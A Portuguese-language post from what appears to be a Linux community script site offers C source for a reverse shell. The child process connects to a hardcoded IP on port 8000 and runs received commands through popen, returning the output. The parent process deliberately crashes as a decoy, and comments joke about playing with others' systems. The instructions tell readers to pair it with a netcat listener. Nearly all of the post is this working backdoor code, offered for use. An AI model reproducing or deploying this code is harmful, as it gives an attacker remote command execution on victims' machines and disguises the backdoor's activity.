reverse shell na marra!
Publicado por felipe (última atualização em 11/12/2024)
[ Hits: 1.194 ]
Esse é um programa de reverse shell criado para linux, ele deve ser compilado e executado sem argumentos.
você deve usar o netcat junto, escutado na porta 8000, ou a que você definir, claro, você vai ter que mudar o ip também.
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <arpa/inet.h> #include <netinet/in.h> #include <unistd.h> int main(int argc, char **argv) { //cria um segundo processo pid_t pid; struct sockaddr_in destino={ .sin_family = AF_INET, .sin_port = htons(8000), .sin_addr.s_addr = inet_addr("127.0.0.1") }; //inicia pid = fork(); if(pid < 0){ perror("pid error"); return 1; } if(pid == 0){ int sock = socket(AF_INET, SOCK_STREAM, 0); if(sock < 0){ perror("socket error"); return 1; } int cnx = connect(sock, (struct sockaddr *)&destino, sizeof(destino)); if(cnx < 0){ perror("connet error"); return 1; } //brinca com sistema dos outros =p FILE *cmd; char buf[256]; char rec[256]; char *msg = "shell>"; while(1){ send(sock, msg, strlen(msg), 0); recv(sock, rec, 256, 0); cmd = popen(rec, "r"); while(fgets(buf, 256, cmd) != NULL){ send(sock, buf, strlen(buf), 0); } } } else{ //leve engano //bufferOverFlow int lol = atoi(argv[1]) * atoi(argv[2]); } return 0; }
Faz um crash no Kernel do Linux
Esse código pode ser considerado um vírus?
intdb - gerador de wordlist numerica
Visualizar câmeras IP ONVIF no Linux sem necessidade de instalar aplicativos
Atualizar Debian Online de uma Versão para outra
Máquina perereca - até onde é possível o uso de Linux?
Redimensionando, espelhando, convertendo e rotacionando imagens com script
Debian 13 Trixie para Iniciantes
Convertendo pacotes DEB que usam ZSTD (Padrão Novo) para XZ (Padrão Antigo)
Debian 13 "trixie&... lançado! (40)
Alguém pode me ajudar entender essas perguntas? (física e matemática) (2)